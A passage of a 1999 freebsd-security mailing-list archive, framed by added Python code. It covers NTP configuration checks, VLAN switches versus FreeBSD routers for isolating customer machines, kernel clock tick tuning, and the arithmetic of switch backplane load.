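        findings.append("no remote server: the LAN will free-run on the local clock forever")

    if "driftfile" not in conf:
        findings.append("no driftfile: the measured frequency error is lost on every restart")

    # Default restrict: xntpd took 'restrict 0.0.0.0' for this, ntpd spells it 'restrict default'.
    default = [args for args in conf.get("restrict", []) if args and args[0] in ("0.0.0.0", "default")]
    if not default:
        findings.append("no default restrict line: any host can query the daemon and attempt runtime changes")
    else:
        missing = {"nomodify", "notrust"} - set(default[0][1:])
        if missing:
            findings.append("default restrict lacks " + ", ".join(sorted(missing)) + " (the thread's config sets both)")
    return findings


# Constructed sample in the shape of the thread's config, minus the broadcast line.
GOOD_CONF = """\
monitor no
broadcastclient no
restrict 0.0.0.0 notrust nomodify
server 127.127.1.0
fudge 127.127.1.0 stratum 8
restrict 192.0.2.10
server 192.0.2.10
driftfile /var/run/ntp.drift
"""

# Same config with the fudge line dropped: the local clock is no longer demoted.
WEAK_CONF = GOOD_CONF.replace("fudge 127.127.1.0 stratum 8\n", "")

if __name__ == "__main__":
    for name, text in (("good", GOOD_CONF), ("weak", WEAK_CONF)):
        print(name, check_fallback(parse_ntp_conf(text)) or ["ok"])
```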
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 22:17: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id D3C0214FED for ; Fri, 20 Aug 1999 22:17:00 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11I3U0-0002ei-00; Fri, 20 Aug 1999 23:14:24 -0600 Message-ID: <37BE35AE.23088FB2@softweyr.com> Date: Fri, 20 Aug 1999 23:14:22 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: Cliff Skolnick Cc: Bigby Findrake , jay d , "Rodney W. Grimes" , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Cliff Skolnick wrote: > > Hacked arp code on one machine could return a broadcast or multicast > ethernet address to an arp query for any machine. The switch would then > treat all traffic as broadcast sending it to every port. Since the machines > TCP/IP layer would receive the packet it woudl still be on the network, of > course it would be receiving and dropping a bit more. Performance may be > effected. :) > > You really want the machines on a seperate segment and to be routed instead > of switched. No, you don't, you want them on seperate VLANs, each of which is it's own broadcast domain. Then your trick won't do anything at all. Go read http://www.xylan.com/library/switchbook/index.html and read "The Switching Book II." It's a short read, and will bring you up to date on what VLANs are and how they can protect segments of your network. 
Then look aroundfor a reasonably priced VLAN-capable switch and learn how to use it. Check out http://www.shopper.com/prdct/721/192.html for a head start on your shopping. ;^) For a better price/port, see http://www.shopper.com/prdct/768/063.html These guys are very hard to beat -- for a few more months. ;^) -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://softweyr.com/ wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Aug 20 22:17:54 1999 Delivered-To: freebsd-security@freebsd.org Received: from mail.xmission.com (mail.xmission.com [198.60.22.22]) by hub.freebsd.org (Postfix) with ESMTP id 62D461543B for ; Fri, 20 Aug 1999 22:17:49 -0700 (PDT) (envelope-from wes@softweyr.com) Received: from [204.68.178.39] (helo=softweyr.com) by mail.xmission.com with esmtp (Exim 2.12 #1) id 11I3XI-0002uT-00; Fri, 20 Aug 1999 23:17:48 -0600 Message-ID: <37BE367A.C6FB893C@softweyr.com> Date: Fri, 20 Aug 1999 23:17:46 -0600 From: Wes Peters Organization: Softweyr LLC X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: "Rodney W. Grimes" Cc: jay d , Evren Yurtesen , freebsd-security@FreeBSD.ORG Subject: Re: multiple machines in the same network References: <199908210027.RAA25131@gndrsh.dnsmgr.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org "Rodney W. Grimes" wrote: > > I already said to put the switch on it's own router port with full > and correct filtering. I see a lot of people replying to ``put them > on thier own segment''. Now I am not sure if they mean put each individule > customer on there own segment, or to lump them all togeather on one segment. 
> My model was to put them all on one switch, with that whole segment of
> the network separated and protected in both directions from any of the
> ISP's and Internet stuff via a router with filtering capability. Putting
> 2 customers on any one segment is always a bad idea, it allows either
> to compromise the other easily by simple tcpdump style sniffing.
>
> The customer per router port is probably the most secure model, even
> more secure than a VLAN switch and single filtered router port, it is
> also the most expensive model.

Ah hell, just buy a switch/router and get the whole mess in one box. If you
buy the RIGHT one, you can get your wide area/internet link AND your firewall
all in the same box. Anyone who thinks a router provides more security than
a VLAN switch doesn't understand how VLANs work.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
http://softweyr.com/                                   wes@softweyr.com

From owner-freebsd-security Fri Aug 20 22:22:52 1999
Message-ID: <37BE377D.4C835B01@softweyr.com>
Date: Fri, 20 Aug 1999 23:22:05 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Will Andrews
Cc: Brett Glass, freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time

Will Andrews wrote:
>
> Simple xntpd:
>
> # echo "server time.nist.gov" > /etc/ntp.conf
> # echo "driftfile /etc/ntp.drift" >> /etc/ntp.conf
> # echo "xntpd_enable=\"YES\"" >> /etc/rc.conf
> # echo "xntpd_flags=\"-c /etc/ntp.conf -p /var/run/xntpd.pid\"" >> /etc/rc.conf
> # xntpd -c /etc/ntp.conf -p /var/run/xntpd.pid
>
> This will suit most people.

The one embellishment I could add would be to check with your ISP; most have
a stratum-2 or stratum-3 time server and would prefer you use theirs to keep
the network traffic down. The more reliable latency between your system and
their server -- lower hops mean more predictable delays -- will make your ntp
client more accurate as well.

Thanks for the quickie-config, Will.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
http://softweyr.com/                                   wes@softweyr.com

From owner-freebsd-security Fri Aug 20 23:01:44 1999
Date: Fri, 20 Aug 1999 23:00:08 -0700 (PDT)
From: Cliff Skolnick
To: Wes Peters
Cc: "Rodney W. Grimes", jay d, Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
In-Reply-To: <37BE367A.C6FB893C@softweyr.com>

On Fri, 20 Aug 1999, Wes Peters wrote:

> Ah hell, just buy a switch/router and get the whole mess in one box. If you
> buy the RIGHT one, you can get your wide area/internet link AND your firewall
> all in the same box. Anyone who thinks a router provides more security than
> a VLAN switch doesn't understand how VLANs work.

With a nice router I can almost always set up filtering and policies on how
ports exchange traffic. It's really hard to create a good packet filter on
a layer 2 device, let alone one that can keep state like a freebsd box used
as a router/firewall. 4 Port Ethernet cards are less than $500 now so you
can build the box with a really low per-port cost. The box costs $2000 for
8 ports at about $250/port. Sure segment your switch into VLANs, then set up
a device to route between them and give you some firewalling. Sure there are
some switches that do provide extensive filtering and even load balancing,
but those are usually a bit more than $250/port.

I think this is similar to the packet filter vs gateway debate, people like
to manage at different levels in the network stack. If you want to manage at
layer 2 you need to add lots of smarts to the switch to understand how IP
packets work for an effective filter. Managing IP at layer 3 is managing a
protocol where it lives. As in the router/gateway debate some will say
understanding the packets is not enough and you need to understand the
payload, hence the gateway approach. Draw a line and stick a stake in the
ground where you as a professional are comfortable.

I sure do understand how VLANs work, I use them all the time.
I'm pretty sure that high end switch you are talking about actually does have
a router in there somewhere and is not a simple switch, at least I've never
seen a simple switch that will handle a WAN link. All of my switches that
I've segmented into VLANs have the VLANs glued together with an RSM or an
external router.

Now saying that I am always amazed at how far up the network stack some
switches will crawl. Right now I'm playing with some switches that will load
balance HTTP connections by binding virtual (ip, port) pairs to real (ip,
port) pairs, they are sure getting smarter.

Cliff

--
| Cliff Skolnick          | "They that can give up essential liberty to |
| Steam Tunnel Operations |  obtain a little temporary safety deserve   |
| cliff@steam.com         |  neither liberty nor safety."               |
| http://www.steam.com/   |            -- Benjamin Franklin, 1759       |

From owner-freebsd-security Fri Aug 20 23:19:41 1999
Message-ID: <37BE44AF.67A392E6@softweyr.com>
Date: Sat, 21 Aug 1999 00:18:23 -0600
From: Wes Peters
Organization: Softweyr LLC
To: Cliff Skolnick
Cc: "Rodney W. Grimes", jay d, Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network

Cliff Skolnick wrote:
>
> On Fri, 20 Aug 1999, Wes Peters wrote:
>
> > Ah hell, just buy a switch/router and get the whole mess in one box. If you
> > buy the RIGHT one, you can get your wide area/internet link AND your firewall
> > all in the same box. Anyone who thinks a router provides more security than
> > a VLAN switch doesn't understand how VLANs work.
>
> With a nice router I can almost always set up filtering and policies on how
> ports exchange traffic. It's really hard to create a good packet filter on
> a layer 2 device,

Who said anything about layer 2 devices? Both the switches I referred to
are layer 3 devices with a wide range of network services available. The
Xylan box offers Checkpoint FW-1 firewall and advanced routing if you want
to get really involved, though you'll need a model with more RAM and Flash.

> 4 Port Ethernet cards are less than $500 now so you
> can build the box with a really low per-port cost. The box costs $2000 for
> 8 ports at about $250/port.

You obviously didn't follow the links. The HP ProCurve I mentioned is $1880
for 40 switched 10/100 ports with layer 3 functionality and VLAN support.
That's $47 per port, much lower than your $250/port, with a LOT more performance
also. The Tolly Group recently tested it and found it capable of sustaining
full wire speed on all 40 ports. I'll just bet your PCI-bus box isn't going
to hit 4 Gbps throughput.

> Sure there are some switches that do provide extensive filtering and even
> load balancing, but those are usually a bit more than $250/port.

Not anymore.

--
"Where am I, and what am I doing in this handbasket?"
Wes Peters                                                Softweyr LLC
http://softweyr.com/                                   wes@softweyr.com

From owner-freebsd-security Sat Aug 21 00:03:49 1999
Date: Sat, 21 Aug 1999 00:03:43 -0700 (PDT)
From: Cliff Skolnick
To: Wes Peters
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
In-Reply-To: <37BE44AF.67A392E6@softweyr.com>

This is starting to drift a bit away, but I'm still saying a FreeBSD machine
with a bunch of ethernets is cheaper and more versatile than a switch that
can do real firewalling. Granted I will admit the performance will not be
gigabit, but for the most part you can filter traffic from one or two DS3s,
and most firewalls are between the LAN and WAN.

On Sat, 21 Aug 1999, Wes Peters wrote:

> Who said anything about layer 2 devices? Both the switches I referred to
> are layer 3 devices with a wide range of network services available. The
> Xylan box offers Checkpoint FW-1 firewall and advanced routing if you want
> to get really involved, though you'll need a model with more RAM and Flash.

And I'm sure the checkpoint software is many thousands of dollars, which will
raise your port cost quite a bit. And that damn 25/50/unlimited licensing is
not cheap.
Unfortunately they did not have prices on the Xylan or Checkpoint site, and
web queries with product numbers turned up only checkpoint and xylan pages.

> > 4 Port Ethernet cards are less than $500 now so you
> > can build the box with a really low per-port cost. The box costs $2000 for
> > 8 ports at about $250/port.
>
> You obviously didn't follow the links. The HP ProCurve I mentioned is $1880
> for 40 switched 10/100 ports with layer 3 functionality and VLAN support.
> That's $47 per port, much lower than your $250/port, with a LOT more performance
> also. The Tolly Group recently tested it and found it capable of sustaining
> full wire speed on all 40 ports. I'll just bet your PCI-bus box isn't going
> to hit 4 Gbps throughput.

Did you read the manual? Not much layer 3 there at all, but it will let you
filter based on IP multicast. If you can do more than this, please point me
to the page number in the manual.

> > Sure there are some switches that do provide extensive filtering and even
> > load balancing, but those are usually a bit more than $250/port.
>
> Not anymore.

The key word is "extensive", nice range of services to filter on, logging,
stateful inspection, etc.

Cliff

--
| Cliff Skolnick          | "They that can give up essential liberty to |
| Steam Tunnel Operations |  obtain a little temporary safety deserve   |
| cliff@steam.com         |  neither liberty nor safety."               |
| http://www.steam.com/   |            -- Benjamin Franklin, 1759       |

From owner-freebsd-security Sat Aug 21 00:28:13 1999
Message-Id: <199908210728.BAA41908@harmony.village.org>
Date: Sat, 21 Aug 1999 01:28:20 -0600
From: Warner Losh
To: Wes Peters
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: OpenBSD
In-reply-to: Your message of "Wed, 18 Aug 1999 13:24:28 MDT." <37BB086C.6CC4261E@softweyr.com>
References: <37BB086C.6CC4261E@softweyr.com> <4.2.0.58.19990818090642.04808ec0@localhost>

In message <37BB086C.6CC4261E@softweyr.com> Wes Peters writes:
: At least this one managed to stay dead for more than a year this
: time. Please don't encourage this by following up to it.

Let's just say that a huge order for ice skates hasn't shipped to the warmer
realms yet, nor is it expected to anytime soon.
Warner

From owner-freebsd-security Sat Aug 21 09:17:21 1999
Date: Sat, 21 Aug 1999 17:10:04 +0100
From: Ben Smithurst
To: Greg Black
Cc: freebsd-security@FreeBSD.ORG
Subject: Re: Securelevel 3 ant setting time
Message-ID: <19990821171004.A24337@lithium.scientia.demon.co.uk>
In-Reply-To: <19990820214657.1605.qmail@alice.gba.oz.au>

Greg Black wrote:

> If you happen to have a machine that needs its regular tweaks by
> ntpdate to exceed half a second, then you can adjust the kernel
> tick a few units either side of its default setting of 10000 so
> that things stay relatively stable.

Where should I change this? I tried changing the value in /sys/conf/param.c
(after copying it to the compile directory) and it seems to have had no
effect. I changed it to 9997; I calculated this as the best value given that
my machine's clock seems to gain about 1 second per hour. The clock still
seems to be running fast, according to the adjustments made by ntpdate. The
new value shows up in kern.clockrate so I must have got something right.
root@scientia:/sys/compile/SCIENTIA# sysctl kern.clockrate
kern.clockrate: { hz = 100, tick = 9997, tickadj = 5, profhz = 1024, stathz = 128 }

--
Ben Smithurst                 | PGP: 0x99392F7D
ben@scientia.demon.co.uk      | key available from keyservers and
                              | ben+pgp@scientia.demon.co.uk

From owner-freebsd-security Sat Aug 21 22:36:24 1999
Date: Sun, 22 Aug 1999 00:35:49 -0500 (CDT)
From: Chris Dillon
To: Wes Peters
Cc: Cliff Skolnick, Bigby Findrake, jay d, "Rodney W. Grimes", Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
In-Reply-To: <37BE35AE.23088FB2@softweyr.com>

On Fri, 20 Aug 1999, Wes Peters wrote:

>
> Check out http://www.shopper.com/prdct/721/192.html for a head start on your
> shopping. ;^)
>

Indeed, nice stuff. :-)

>
> For a better price/port, see http://www.shopper.com/prdct/768/063.html
> These guys are very hard to beat -- for a few more months. ;^)
>

HP is lowballing everybody on price with this switch. In case you're
wondering, there's also a $400 rebate on top of that already-low price. I'm
buying one of these puppies next week to see how it works out. Pretty hard
to pass up a 40-port 10/100 switch with pretty good expandability for only
$1400. Lifetime warranty, too(!).
The only Gotcha I've found by looking at the specs is that it only has a
3.8Gbit/sec backplane. This is only enough to keep 19 100mbit ports saturated
at full duplex, but you're also paying less money for this 40-port switch
than most other halfway-decent 24-port switches. I wonder if local switching
takes place on each of the "blades" (expansion modules). I still think it's
worth the money even with the limited backplane.

--
Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net
FreeBSD: The fastest and most stable server OS on the planet.
For Intel x86 and Alpha architectures (SPARC under development).
( http://www.freebsd.org )

"One should admire Windows users. It takes a great deal of courage
to trust Windows with your data."

From owner-freebsd-security Sat Aug 21 23:37:11 1999
Date: Sun, 22 Aug 1999 01:34:47 -0500 (CDT)
From: Chris Dillon
To: Wes Peters
Cc: Cliff Skolnick, "Rodney W. Grimes", jay d, Evren Yurtesen, freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
In-Reply-To: <37BE44AF.67A392E6@softweyr.com>

On Sat, 21 Aug 1999, Wes Peters wrote:

> You obviously didn't follow the links. The HP ProCurve I mentioned is $1880
> for 40 switched 10/100 ports with layer 3 functionality and VLAN support.
> That's $47 per port, much lower than your $250/port, with a LOT more performance
> also. The Tolly Group recently tested it and found it capable of sustaining
> full wire speed on all 40 ports. I'll just bet your PCI-bus box isn't going
> to hit 4 Gbps throughput.

I noticed the only "L3 support" from the spec sheets of the 4000M and 8000M
is IGMP snooping to control multicast traffic, and "protocol filtering" only
on the 8000M. Nothing close to IP routing, however (not that you said it
did, specifically, just clarifying). When the Tolly Group said they could
"sustain full wire speed on all 40 ports", was that testing each one at a
time or all at once? My math isn't quite warped enough to allow 40 100Mbit/FD
ports to all be saturated with only a 3.8Gbit backplane, unless local
switching occurs on each of the port modules, and even then the "throughput
test" would have to take that into account and not try to move too much
data across the backplane.

You may also notice that the HP ProCurve 9304M and 9308M Routing Switches
(these DO have IP/IPX routing, but they certainly aren't cheap... nice kit,
BTW), bear an uncanny resemblance in both looks, specs, and a digit of their
model name to the Foundry Networks BigIron 4000 and 8000, respectively.

--
Chris Dillon - cdillon@wolves.k12.mo.us - cdillon@inter-linc.net
FreeBSD: The fastest and most stable server OS on the planet.
For Intel x86 and Alpha architectures (SPARC under development).
( http://www.freebsd.org )

"One should admire Windows users. It takes a great deal of courage
to trust Windows with your data."
From owner-freebsd-security Sat Aug 21 23:51:42 1999
Message-Id: <199908220649.XAA31700@gndrsh.dnsmgr.net>
Date: Sat, 21 Aug 1999 23:49:10 -0700 (PDT)
From: "Rodney W. Grimes"
To: cdillon@wolves.k12.mo.us (Chris Dillon)
Cc: wes@softweyr.com (Wes Peters), cliff@steam.com (Cliff Skolnick), service_account@yahoo.com (jay d), yurtesen@ispro.net.tr (Evren Yurtesen), freebsd-security@FreeBSD.ORG
Subject: Re: multiple machines in the same network
In-Reply-To: from Chris Dillon at "Aug 22, 1999 01:34:47 am"

> On Sat, 21 Aug 1999, Wes Peters wrote:
>
> > You obviously didn't follow the links. The HP ProCurve I mentioned is $1880
> > for 40 switched 10/100 ports with layer 3 functionality and VLAN support.
> > That's $47 per port, much lower than your $250/port, with a LOT more performance
> > also. The Tolly Group recently tested it and found it capable of sustaining
> > full wire speed on all 40 ports. I'll just bet your PCI-bus box isn't going
> > to hit 4 Gbps throughput.
>
> I noticed the only "L3 support" from the spec sheets of the 4000M and
> 8000M is IGMP snooping to control multicast traffic, and "protocol
> filtering" only on the 8000M. Nothing close to IP routing, however
> (not that you said it did, specifically, just clarifying). When the
> Tolly Group said they could "sustain full wire speed on all 40 ports",
> was that testing each one at a time or all at once? My math isn't
> quite warped enough to allow 40 100Mbit/FD ports to all be saturated
> with only a 3.8Gbit backplane, unless local switching occurs on each
> of the port modules, and even then the "throughput test" would have to
> take that into account and not try to move too much data across the
> backplane.

You're making a common mistake here when an ``ALL PORTS FULL LOAD'' test is
done, if you have 40 ports all being sent data at 100MB/sec that data is
going to have to come out on 40 ports someplace, so you only need 4Gbit/sec
of backplane to do this. That's 4G bytes of data in, 4G across the backplane,
and 4G back out of the box. Maybe a drawing would help:

    rxpair of port 1 >  +---------+  > txpair of port n
    rxpair of port 2 >  |         |    ....
    rxpair of port 3 >  | Fabric  |  > txpair of port 3
    ...                 |         |  > txpair of port 2
    rxpair of port n >  +---------+  > txpair of port 1

As you can see the Fabric only has to handle 40 x 100Mb/s to keep all 40
ports busy at full duplex. The 3.8 Gb/s spec comes up a little short, but
only by 2 ports... and it had better be darned efficient as far as overhead
goes...

Allowing the port cards to short circuit bridge (and every switch chip set I
have looked at does this) makes it easy to pass this test, in fact you can
do it with 0 load on the backplane. My drawing above tends to put the
maximal load on a switch's backplane, but unless the vendor tells you exactly
how they tested the benchmark is like any other benchmark without all the
nitty gritty details, total sales and marketing propaganda.

> You may also notice that the HP ProCurve 9304M and 9308M Routing
> Switches (these DO have IP/IPX routing, but they certainly aren't
> cheap... nice kit, BTW), bear an uncanny resemblance in both looks,
> specs, and a digit of their model name to the Foundry Networks BigIron
> 4000 and 8000, respectively.

:-)

--
Rod Grimes - KD7CAX - (RWG25)                    rgrimes@gndrsh.dnsmgr.net
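Rod's backplane arithmetic and his closing point about port cards that bridge locally, worked as an added Python model (not code from the thread or from any vendor). It reproduces the 38-port versus 19-port figures and shows how the traffic pattern and local bridging change fabric load; the 8-ports-per-card figure is an assumption, since the thread never states the blade size.

```python
# Added example, not from the thread: a model of the "all ports full load"
# test. Each 100 Mb/s receive stream is forwarded to exactly one transmit
# port and crosses the fabric at most once, so N saturated full-duplex ports
# need N x 100 Mb/s of fabric, not 2N x 100 Mb/s. Port cards that bridge
# locally ("short circuit bridge") keep same-card traffic off the backplane.

PORT_RATE_MBPS = 100       # 10/100 ports, each driven at the full 100 Mb/s
NUM_PORTS = 40             # the 40-port switch discussed in the thread
BACKPLANE_MBPS = 3800      # the 3.8 Gbit/s backplane figure from the thread
PORTS_PER_CARD = 8         # assumption: the thread never states the card size


def card_of(port, ports_per_card=PORTS_PER_CARD):
    """Which port card (blade) a zero-based port number sits on."""
    return port // ports_per_card


def fabric_load_mbps(flows, local_bridging=False, port_rate=PORT_RATE_MBPS):
    """Backplane load in Mb/s for a list of (rx_port, tx_port) flows.

    A flow is one port's full receive stream forwarded to one transmit port;
    it costs port_rate once on the fabric. With local_bridging, a flow whose
    ends share a card is switched on the card and costs nothing."""
    load = 0
    for rx, tx in flows:
        if local_bridging and card_of(rx) == card_of(tx):
            continue
        load += port_rate
    return load


def is_full_duplex_saturation(flows, num_ports=NUM_PORTS):
    """True when every port both receives one stream and transmits one."""
    rx_ports = sorted(rx for rx, _ in flows)
    tx_ports = sorted(tx for _, tx in flows)
    return rx_ports == list(range(num_ports)) == tx_ports


def rod_pattern(num_ports=NUM_PORTS):
    """Rod's drawing: port 1 sends to port n, port 2 to port n-1, and so on.
    Almost every flow crosses cards, so this is close to the worst case."""
    return [(i, num_ports - 1 - i) for i in range(num_ports)]


def neighbour_pattern(num_ports=NUM_PORTS):
    """Each even port swaps traffic with the next odd port. With an even
    number of ports per card both ends share a card, so local bridging
    lets the switch pass the test with zero backplane load."""
    flows = []
    for i in range(0, num_ports, 2):
        flows.append((i, i + 1))
        flows.append((i + 1, i))
    return flows


def ports_supported(backplane_mbps=BACKPLANE_MBPS, port_rate=PORT_RATE_MBPS):
    """Ports a fabric can keep saturated at full duplex, counting each stream
    once (Rod's reading) versus counting both directions (the 19-port reading)."""
    return {
        "stream_counted_once": backplane_mbps // port_rate,
        "both_directions_counted": backplane_mbps // (2 * port_rate),
    }


if __name__ == "__main__":
    worst, best = rod_pattern(), neighbour_pattern()
    print("Rod's pattern, no local bridging:  ", fabric_load_mbps(worst), "Mb/s")
    print("Rod's pattern, local bridging:     ", fabric_load_mbps(worst, True), "Mb/s")
    print("neighbour pattern, local bridging: ", fabric_load_mbps(best, True), "Mb/s")
    print("ports a 3.8 Gb/s fabric keeps busy:", ports_supported())
```

The lesson for reading a vendor benchmark is the one Rod draws: without the traffic pattern, "full wire speed on all ports" says nothing about the backplane, because a neighbour pattern on locally bridging cards passes with the fabric idle.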